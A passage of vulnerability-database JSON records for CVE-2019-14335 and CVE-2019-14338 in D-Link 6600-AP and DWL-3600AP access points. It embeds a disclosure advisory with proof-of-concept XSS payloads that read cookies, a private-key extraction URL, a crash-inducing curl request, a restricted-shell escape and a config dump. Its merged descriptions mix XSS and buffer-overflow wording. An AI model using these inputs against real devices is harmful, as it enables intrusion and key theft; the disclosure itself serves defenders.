"id": "CNVD-2019-29142"
},
{
"db": "VULHUB",
"id": "VHN-146271"
},
{
"db": "VULMON",
"id": "CVE-2019-14335"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007582"
},
{
"db": "PACKETSTORM",
"id": "153840"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1636"
},
{
"db": "NVD",
"id": "CVE-2019-14335"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-08-28T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-29142"
},
{
"date": "2019-08-08T00:00:00",
"db": "VULHUB",
"id": "VHN-146271"
},
{
"date": "2019-08-08T00:00:00",
"db": "VULMON",
"id": "CVE-2019-14335"
},
{
"date": "2019-08-15T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-007582"
},
{
"date": "2019-07-31T19:01:29",
"db": "PACKETSTORM",
"id": "153840"
},
{
"date": "2019-07-31T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201907-1636"
},
{
"date": "2019-08-08T14:15:11.757000",
"db": "NVD",
"id": "CVE-2019-14335"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-08-28T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-29142"
},
{
"date": "2020-08-24T00:00:00",
"db": "VULHUB",
"id": "VHN-146271"
},
{
"date": "2021-04-23T00:00:00",
"db": "VULMON",
"id": "CVE-2019-14335"
},
{
"date": "2019-08-15T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-007582"
},
{
"date": "2020-08-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201907-1636"
},
{
"date": "2024-11-21T04:26:32.040000",
"db": "NVD",
"id": "CVE-2019-14335"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "local",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201907-1636"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link 6600-AP and DWL-3600AP Authentication vulnerabilities in devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-007582"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "authorization issue",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201907-1636"
}
],
"trust": 0.6
}
}
VAR-201908-0916
Vulnerability from variot - Updated: 2024-11-23 21:52
An issue was discovered on D-Link 6600-AP and DWL-3600AP Ax 4.2.0.14 21/03/2019 devices. There is a post-authentication admin.cgi?action= XSS vulnerability on the management interface. D-Link 6600-AP and DWL-3600AP devices contain a cross-site scripting vulnerability. Information may be obtained and information may be altered. The D-Link 6600-AP and DWL-3600AP are both wireless access point devices from D-Link, Taiwan. A buffer overflow vulnerability exists in the D-Link 6600-AP and DWL-3600AP. The vulnerability stems from a network system or product that does not properly validate data boundaries when performing operations on memory, causing erroneous read and write operations to be performed on other associated memory locations. An attacker could exploit the vulnerability to cause a buffer overflow or heap overflow. The vulnerability stems from the lack of correct validation of client data in WEB applications.
# Security Advisory - 22/07/2019
Multiple vulnerabilities found in the D-Link 6600-AP device running the latest firmware (version 4.2.0.14). D-Link 6600-AP is not produced anymore but the support is still provided by D-Link as described on the D-Link website. Note that this product is built for business customers of D-Link and we can expect to have thousands of devices at risk. Code base shared with DWL-3600AP and DWL-8610AP
This advisory is sent to D-Link the 22/05/2019
Many Thanks to the D-Link Security Team for their prompt reactivity!
Affected Product
D-Link 6600-AP, DWL-3600AP + Vulnerability number 2 affects also DWL-8610AP
Firmware version
4.2.0.14 Revision Ax date: 21/03/2019
Last version available
https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point
Product Identifier
WLAN-EAP
Hardware Version
A2
Manufacturer
D-LINK
Product Description
The DWL-6600AP is designed to be the best-in-class indoor Access Point for business environments. With high data transmission speeds, load balancing features, it can be deployed as a standalone wireless Access Point or used as the foundation for a managed wireless network. Source: https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point
List of Vulnerabilities
- CVE-2019-14338 - Post-authenticated XSS
- CVE-2019-14334 - Post-authenticated Certificate and RSA Private Key extraction through http command
- CVE-2019-14333 - Pre-authenticated Denial of service leading to the reboot of the AP
- CVE-2019-14337 - Escape shell in the restricted command line interface
- CVE-2019-14335 - Post-authenticated Denial of service leading to the reboot of the AP
- CVE-2019-14336 - Post-authenticated Dump all the config files (post-auth)
- CVE-2019-14332 - Use of weak ciphers for SSH
1. Post-authenticated XSS
Exploitation: Local
Severity Level: High
CVE ID : CVE-2019-14338
Proof-of concept
Example 1: http://10.90.90.91/admin.cgi?action=<script>alert(document.cookie)</script>
Example 2: http://10.90.90.91/admin.cgi?action=+guest<script>alert('Pwned')</script>
2. Post-authenticated Certificate and RSA Private Key extraction through http command
Exploitation: Local
Severity Level: High
CVE ID : CVE-2019-14334
Proof-of concept
http://10.90.90.91/sslcert-get.cgi?
Result of the command: File "mini_httpd.pem" automatically extracted
3. Pre-authenticated Denial of service leading to the reboot of the AP
Exploitation: Local
Severity Level: High
CVE ID: CVE-2019-14333
Proof-of concept
kali# curl -X POST 'http://10.90.90.91/admin.cgi?action=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
4. Escape shell in the restricted command line interface
Exploitation: Local
Severity Level: High
CVE ID : CVE-2019-14337
Proof-of concept
DLINK-WLAN-AP# wget
Invalid command.
DLINK-WLAN-AP# /bin/sh -c wget
BusyBox v1.18.2 (2019-01-24 14:39:11 IST) multi-call binary.
Usage: wget [-c|--continue] [-s|--spider] [-q|--quiet]
[-O|--output-document FILE]
[--header 'header: value'] [-Y|--proxy on/off] [-P DIR]
[--no-check-certificate] [-U|--user-agent AGENT][-T SEC] URL
Retrieve files via HTTP or FTP
Options:
        -s      Spider mode - only check file existence
        -c      Continue retrieval of aborted transfer
        -q      Quiet
        -P DIR  Save to DIR (default .)
        -T SEC  Network read timeout is SEC seconds
        -O FILE Save to FILE ('-' for stdout)
        -U STR  Use STR for User-Agent header
        -Y      Use proxy ('on' or 'off')
DLINK-WLAN-AP#
5. Post-authenticated Denial of service leading to the reboot of the AP
Exploitation: Local
Severity Level: High
CVE ID : CVE-2019-14335
Proof-of concept
http://10.90.90.91/admin.cgi?action=%s
6. Post-authenticated Dump all the config files
Exploitation: Local
Severity Level: High
CVE ID : CVE-2019-14336
Proof-of concept
http://10.90.90.91/admin.cgi?action=
7. Use of weak ciphers
Exploitation: Local
Severity Level: High
CVE ID : CVE-2019-14332
Proof-of concept
root@kali:~# ssh -l admin 10.90.90.91 -oKexAlgorithms=diffie-hellman-group1-sha1
The authenticity of host '10.90.90.91 (10.90.90.91)' can't be established.
RSA key fingerprint is SHA256:X8FPwxBpaDJq77gKs/HxggThGUIXWH4nu6tukuW6PGI.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.90.90.91' (RSA) to the list of known hosts.
admin@10.90.90.91's password:
Enter 'help' for help.
DLINK-WLAN-AP# help
Report Timeline
22/05/2019 : This advisory is sent to D-Link - the contents of this Report will be made public within 30 days.
22/06/2019 : Public release of the security advisory to mailing list
Fixes/Updates
ftp://ftp2.dlink.com/PRODUCTS/DWL-3600AP/REVA/DWL-3600AP_REVA_FIRMWARE_v4.2.0.15.zip
ftp://ftp2.dlink.com/PRODUCTS/DWL-6600AP/REVA/DWL-6600AP_REVA_FIRMWARE_v4.2.0.15.zip
About me - pwn.sandstorm@gmail.com
Independent EMSecurity Researcher in the field of IoT under the Sun
Always open to hack and share
Greetings - Ack P. Kim and others for the online resources
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201908-0916",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "6600-ap",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "4.2.0.14"
},
{
"model": "dwl-3600ap",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "4.2.0.14"
},
{
"model": "d-link 6600-ap",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": "4.2.0.14"
},
{
"model": "dwl-3600ap",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": "4.2.0.14"
},
{
"model": "6600-ap",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
},
{
"model": "dwl-3600ap ax devices",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "4.2.0.1421/03/2019"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-29147"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007263"
},
{
"db": "NVD",
"id": "CVE-2019-14338"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:d-link:6600-ap_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:d-link:dwl-3600ap_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-007263"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Sandstorm Security",
"sources": [
{
"db": "PACKETSTORM",
"id": "153840"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1626"
}
],
"trust": 0.7
},
"cve": "CVE-2019-14338",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CVE-2019-14338",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CNVD-2019-29147",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "VHN-146274",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.8,
"id": "CVE-2019-14338",
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 6.1,
"baseSeverity": "Medium",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "CVE-2019-14338",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "None",
"scope": "Changed",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2019-14338",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2019-14338",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNVD",
"id": "CNVD-2019-29147",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201907-1626",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-146274",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-29147"
},
{
"db": "VULHUB",
"id": "VHN-146274"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007263"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1626"
},
{
"db": "NVD",
"id": "CVE-2019-14338"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "An issue was discovered on D-Link 6600-AP and DWL-3600AP Ax 4.2.0.14 21/03/2019 devices. There is a post-authentication admin.cgi?action= XSS vulnerability on the management interface. D-Link 6600-AP and DWL-3600AP The device contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. The D-Link 6600-AP and DWL-3600AP are both wireless access point devices from D-Link, Taiwan. A buffer overflow vulnerability exists in the D-Link 6600-AP and DWL-3600AP. The vulnerability stems from a network system or product that does not properly validate data boundaries when performing operations on memory, causing erroneous read and write operations to be performed on other associated memory locations. An attacker could exploit the vulnerability to cause a buffer overflow or heap overflow. The vulnerability stems from the lack of correct validation of client data in WEB applications. # Security Advisory - 22/07/2019\n\n## Multiple vulnerabilities found in the D-Link 6600-AP device running\nthe latest firmware (version 4.2.0.14). D-Link 6600-AP is not produced\nanymore but the support is still provided by D-Link as per described\non the D-Link website. Not that this product is built for business\ncustomers of D-Link and we can expect to have thousands of devices at\nrisk. 
Code base shared with DWL-3600AP and DWL-8610AP\n\n### This advisory is sent to D-Link the 22/05/2019\nMany Thanks to the D-Link Security Team for their prompt reactivity!\n\n### Affected Product\nD-Link 6600-AP, DWL-3600AP + Vulnerability number 2 affects also DWL-8610AP\n\n### Firmware version\n4.2.0.14 Revision Ax date: 21/03/2019\n\n### Last version available\nhttps://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point\n\n### Product Identifier\nWLAN-EAP\n\n### Hardware Version\nA2\n\n### Manufacturer\nD-LINK\n\n## Product Description\nThe DWL-6600AP is designed to be the best-in-class indoor Access Point\nfor business environments. With high data transmission speeds, load\nbalancing features, it can be deployed as a standalone wireless Access\nPoint or used as the foundation for a managed wireless network. \nSource: https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point\n\n## List of Vulnerabilities\n\n 1. CVE-2019-14338 - Post-authenticated XSS\n 2. CVE-2019-14334 - Post-authenticated Certificate and RSA Private\nKey extraction\nthrough http command\n 3. CVE-2019-14333 - Pre-authenticated Denial of service leading to\nthe reboot of the AP\n 4. CVE-2019-14337 - Escape shell in the restricted command line interface\n 5. CVE-2019-14335 - Post-authenticated Denial of service leading to\nthe reboot of the AP\n 6. CVE-2019-14336 - Post-authenticated Dump all the config files (post-auth)\n 7. CVE-2019-14332 - Use of weak ciphers for SSH\n\n### 1. Post-authenticated XSS\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID : CVE-2019-14338\n#### Proof-of concept\n\nExample 1: http://10.90.90.91/admin.cgi?action=\u003cscript\u003ealert(document.cookie)\u003c/script\u003e\n\nExample 2: http://10.90.90.91/admin.cgi?action=+guest\u003cscript\u003ealert(\u0027Pwned\u0027)\u003c/script\u003e\n\n### 2. 
Post-authenticated Certificate and RSA Private Key extraction\nthrough http command\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID : CVE-2019-14334\n#### Proof-of concept\n\nhttp://10.90.90.91/sslcert-get.cgi?\n\nResult of the command: File \"mini_httpd.pem\" automatically extracted\n\n### 3. Pre-authenticated Denial of service leading to the reboot of the AP\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID: CVE-2019-14333\n#### Proof-of concept\n kali# curl -X POST\n\u0027http://10.90.90.91/admin.cgi?action=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n\n### 4. 
Escape shell in the restricted command line interface\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID : CVE-2019-14337\n#### Proof-of concept\n\nDLINK-WLAN-AP# wget\nInvalid command. \nDLINK-WLAN-AP# `/bin/sh -c wget`\nBusyBox v1.18.2 (2019-01-24 14:39:11 IST) multi-call binary. \nUsage: wget [-c|--continue] [-s|--spider] [-q|--quiet]\n[-O|--output-document FILE]\n [--header \u0027header: value\u0027] [-Y|--proxy on/off] [-P DIR]\n [--no-check-certificate] [-U|--user-agent AGENT][-T SEC] URL\n\nRetrieve files via HTTP or FTP\n\nOptions:\n -s Spider mode - only check file existence\n -c Continue retrieval of aborted transfer\n -q Quiet\n -P DIR Save to DIR (default .)\n -T SEC Network read timeout is SEC seconds\n -O FILE Save to FILE (\u0027-\u0027 for stdout)\n -U STR Use STR for User-Agent header\n -Y Use proxy (\u0027on\u0027 or \u0027off\u0027)\n\nDLINK-WLAN-AP#\n\n### 5. Post-authenticated Denial of service leading to the reboot of the AP\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID : CVE-2019-14335\n#### Proof-of concept\n\nhttp://10.90.90.91/admin.cgi?action=%s\n\n### 6. Post-authenticated Dump all the config files\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID : CVE-2019-14336\n#### Proof-of concept\n\nhttp://10.90.90.91/admin.cgi?action=\n\n### 7. Use of weak ciphers\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID : CVE-2019-14332\n#### Proof-of concept\n\nroot@kali:~# ssh -l admin 10.90.90.91 -oKexAlgorithms=diffie-hellman-group1-sha1\nThe authenticity of host \u002710.90.90.91 (10.90.90.91)\u0027 can\u0027t be established. \nRSA key fingerprint is SHA256:X8FPwxBpaDJq77gKs/HxggThGUIXWH4nu6tukuW6PGI. \nAre you sure you want to continue connecting (yes/no)? yes\nWarning: Permanently added \u002710.90.90.91\u0027 (RSA) to the list of known hosts. \nadmin@10.90.90.91\u0027s password:\nEnter \u0027help\u0027 for help. 
\n\nDLINK-WLAN-AP# help\n\n## Report Timeline\n22/05/2019 : This advisory is sent to D-Link - the contents of this\nReport will be made public within 30 days. \n22/06/2019 : Public release of the security advisory to mailing list\n\n## Fixes/Updates\nftp://ftp2.dlink.com/PRODUCTS/DWL-3600AP/REVA/DWL-3600AP_REVA_FIRMWARE_v4.2.0.15.zip\nftp://ftp2.dlink.com/PRODUCTS/DWL-6600AP/REVA/DWL-6600AP_REVA_FIRMWARE_v4.2.0.15.zip\n\n\n## About me - pwn.sandstorm@gmail.com\n#### Independent EMSecurity Researcher in the field of IoT under the Sun\n#### Always open to hack and share\n#### Greetings - Ack P. Kim and others for the online resources\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-14338"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007263"
},
{
"db": "CNVD",
"id": "CNVD-2019-29147"
},
{
"db": "VULHUB",
"id": "VHN-146274"
},
{
"db": "PACKETSTORM",
"id": "153840"
}
],
"trust": 2.34
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-14338",
"trust": 3.2
},
{
"db": "PACKETSTORM",
"id": "153840",
"trust": 3.2
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007263",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1626",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2019-29147",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-146274",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-29147"
},
{
"db": "VULHUB",
"id": "VHN-146274"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007263"
},
{
"db": "PACKETSTORM",
"id": "153840"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1626"
},
{
"db": "NVD",
"id": "CVE-2019-14338"
}
]
},
"id": "VAR-201908-0916",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-29147"
},
{
"db": "VULHUB",
"id": "VHN-146274"
}
],
"trust": 1.4935897333333332
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"IoT"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-29147"
}
]
},
"last_update_date": "2024-11-23T21:52:00.589000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Security Advisory",
"trust": 0.8,
"url": "https://us.dlink.com/en/security-advisory"
},
{
"title": "Security Bulletin",
"trust": 0.8,
"url": "https://www.dlink.com/en/security-bulletin"
},
{
"title": "Patch for D-Link 6600-AP and DWL-3600AP Buffer Overflow Vulnerabilities",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/177593"
},
{
"title": "D-Link 6600-AP and DWL-3600AP Buffer error vulnerability fix",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=95738"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-29147"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007263"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1626"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-146274"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007263"
},
{
"db": "NVD",
"id": "CVE-2019-14338"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.1,
"url": "http://packetstormsecurity.com/files/153840/d-link-6600-ap-xss-dos-information-disclosure.html"
},
{
"trust": 1.7,
"url": "https://us.dlink.com/en/security-advisory"
},
{
"trust": 1.7,
"url": "https://www.dlink.com/en/security-bulletin"
},
{
"trust": 1.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14338"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-14338"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14336"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14332"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14335"
},
{
"trust": 0.1,
"url": "http://10.90.90.91/admin.cgi?action=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14333"
},
{
"trust": 0.1,
"url": "http://10.90.90.91/admin.cgi?action=%s"
},
{
"trust": 0.1,
"url": "http://10.90.90.91/admin.cgi?action=+guest\u003cscript\u003ealert(\u0027pwned\u0027)\u003c/script\u003e"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14337"
},
{
"trust": 0.1,
"url": "http://10.90.90.91/admin.cgi?action=\u003cscript\u003ealert(document.cookie)\u003c/script\u003e"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14334"
},
{
"trust": 0.1,
"url": "http://10.90.90.91/sslcert-get.cgi?"
},
{
"trust": 0.1,
"url": "https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point"
},
{
"trust": 0.1,
"url": "http://10.90.90.91/admin.cgi?action="
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-29147"
},
{
"db": "VULHUB",
"id": "VHN-146274"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007263"
},
{
"db": "PACKETSTORM",
"id": "153840"
},
{
"db": "CNNVD",
